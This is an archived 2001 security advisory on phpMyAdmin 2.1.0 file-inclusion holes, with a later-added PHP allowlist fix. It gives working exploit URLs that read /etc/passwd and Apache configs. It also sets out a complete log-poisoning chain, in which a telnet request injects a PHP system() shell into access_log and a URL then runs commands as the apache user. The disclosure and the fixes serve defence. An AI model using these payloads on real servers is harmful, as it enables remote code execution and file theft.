arbitrary PHP Codes as apache user.
From: <sl4shat_private>
Date: Sun, 1 Jul 2001 23:43:17 GMT
Message-id: <200107012343.115eat_private>

Note: sorry for my poor English.

************************************************************************************

First of all, I want to ask a question: is it normal that if, in a MySQL query (via PHP), I put

    "select * from $table" . "_files where ID=1"

and I post table="atable #", MySQL considers the new query as a valid one (so the final query will be "select * from atable")? In my opinion, this is a serious hole in MySQL queries. (I use mysql_query() to do this.)

************************************************************************************

In this text, I will assume that I have access to the phpMyAdmin of victim.com and that phpMyAdmin is located at http://www.victim.com/phpMyAdmin

* Overview

phpMyAdmin is a useful PHP tool for managing a MySQL database through a web-based interface. phpMyAdmin is used a lot by web providers who give access to a MySQL database. For more information see: http://www.phpwizard.net/projects/phpMyAdmin/

The holes described below were tested on a Debian 2.2 and on a RedHat 7.1 with phpMyAdmin 2.1.0.

I. The phpMyAdmin 2.1.0 holes

There are two include() holes in phpMyAdmin 2.1.0. This is the latest version, but the holes may also work on older ones. These two holes can be reached with something like this:

    http://www.victim.com/phpMyAdmin/sql.php?goto=/etc/passwd&btnDrop=No (*)

and

    http://www.victim.com/phpMyAdmin/tbl_replace.php?db=test&table=ess&goto=/etc/passwd

Of course, to exploit these holes, the attacker needs to be logged in to the remote phpMyAdmin. These holes come from a line like this:

    include($goto);

in sql.php and in tbl_replace.php. With this you can read a lot of files and execute any PHP code on the remote server.

(*) Note: for btnDrop the value could be in another language (in my configuration, I must put 'Non' instead of 'No').

II. Using world-readable (apache) log files to execute our own PHP code

By using world-readable log files (here I will use the apache log files, but you can use other log files like lastlog (by giving the right login), the telnet log file, the ftp log file...), you can execute, with the hole described before, the PHP code you want.

First, you get the apache configuration files to know where the logs are:

    http://www.victim.com/phpMyAdmin/sql.php?goto=/etc/apache/conf/httpd.conf&btnDrop=No
    http://www.victim.com/phpMyAdmin/sql.php?goto=/etc/apache/conf/srm.conf&btnDrop=No
    http://www.victim.com/phpMyAdmin/sql.php?goto=/etc/apache/conf/access.conf&btnDrop=No

Now, we assume that the logs are in /var/log/httpd/error_log for errors and in /var/log/httpd/access_log for apache access (it must be the default in RedHat 7.1). We telnet to port 80:

    # telnet www.victim.com 80
    Trying xxx.xxx.xxx.xxx...
    Connected to www.victim.com.
    Escape character is '^]'.
    get <pre><? system(stripslashes($parameters)); ?></pre>
    ^]
    telnet> quit
    Connection closed.
    #

Here, after get, we can put any PHP code we want. Now we can execute any remote command we want as the apache user by doing:

    http://www.victim.com/phpMyAdmin/sql.php?goto=/var/log/httpd/access_log&btnDrop=No&parameters=ls%20-l%20/

(in fact, by sending a unix command in parameters). Now you are able to do nearly whatever the apache user could do.

III. Solutions

The solutions to the phpMyAdmin holes are to put user access control in place, restrict the users able to access phpMyAdmin, etc.

The code changes to avoid these holes are:

in sql.php, replace:

    if(file_exists($goto)) {
        include("header.inc.php");
        if(isset($zero_rows) && !empty($zero_rows))
            $message = $zero_rows;
        else
            $message = $strEmptyResultSet;
        include($goto);
    } else {
        $message = $zero_rows;
        Header("Location: $goto");
    }

by:

    $message = $zero_rows;
    Header("Location: $goto");

and in tbl_replace.php, replace:

    if(file_exists($goto)) {
        include("header.inc.php");
        $message = $strModifications;
        include($goto);
    } else
        Header("Location: $goto");
    exit;

by:

    Header("Location: $goto");

Of course, phpMyAdmin may not work properly after this correction (not tested).

For the second hole (world-readable log files), just make all the log files you can read-write for root and nothing for others. Also, try not to put something like include($params); in your PHP code (or in other server-side languages like perl). Remove authorization for unix functions in the PHP configuration.

Slash <slash-rtcat_private> [RtC]
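The two sinks discussed in this post, include($goto) in sql.php/tbl_replace.php and a table name interpolated into a query string, can both be closed the same way: the untrusted value is checked against a fixed allowlist before it reaches the sink, instead of being tested with file_exists() or concatenated as-is. The PHP below is an added example written for this page, not phpMyAdmin's code; the allowlisted file names, the main.php redirect target and the identifier rule are assumptions, and it is written for current PHP rather than the PHP 4 of 2001.

```php
<?php
// Added example (not phpMyAdmin code): allowlist checks for the two sinks
// discussed in the post, include($goto) and a table name interpolated into
// a query string. The file names below are assumed, not taken from the tool.

// Only these scripts may be the target of $goto; anything else is rejected.
const ALLOWED_GOTO = ['tbl_properties.php', 'db_details.php', 'main.php'];

// Return the validated file name, or null if $goto is not an exact allowlist
// entry. Comparing against fixed strings means "../", "/etc/passwd" or a log
// file path can never reach include(), whatever file_exists() would say.
function safe_goto(string $goto): ?string
{
    return in_array($goto, ALLOWED_GOTO, true) ? $goto : null;
}

// MySQL treats "#" (and "-- ") as the start of a comment, so a table name such
// as "atable #" silently truncates the rest of the statement. Restricting
// identifiers to [A-Za-z0-9_] (MySQL's 64-character limit) keeps comment
// markers, quotes and spaces out. Returns the identifier or null.
function safe_identifier(string $name): ?string
{
    return preg_match('/^[A-Za-z0-9_]{1,64}$/', $name) === 1 ? $name : null;
}

// Build the query from the post with a validated identifier. Returns null when
// the name is rejected, so the caller never runs a truncated query.
function files_query(string $table): ?string
{
    $id = safe_identifier($table);
    if ($id === null) {
        return null;
    }
    return "select * from {$id}_files where ID=1";
}

// Dispatch $goto: validated targets are included, everything else becomes a
// redirect to a fixed page rather than to the attacker-supplied value.
function dispatch(string $goto): void
{
    $target = safe_goto($goto);
    if ($target === null) {
        header('Location: main.php');
        exit;
    }
    include $target;
}

// Constructed checks mirroring the inputs from the post.
assert(safe_goto('/etc/passwd') === null);
assert(safe_goto('/var/log/httpd/access_log') === null);
assert(safe_goto('main.php') === 'main.php');
assert(files_query('atable #') === null);
assert(files_query('atable') === 'select * from atable_files where ID=1');
```

With in_array() in strict mode the comparison is against whole fixed strings, so neither a path traversal nor a poisoned log file can be handed to include; the identifier regex rejects "#", "--", quotes and spaces, so a comment marker posted in the table name cannot cut the statement short. On an old PHP without mysql prepared statements this kind of identifier check is the only place the table name can be made safe.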
This archive was generated by hypermail 2b30 : Mon Jul 02 2001 - 02:53:36 PDT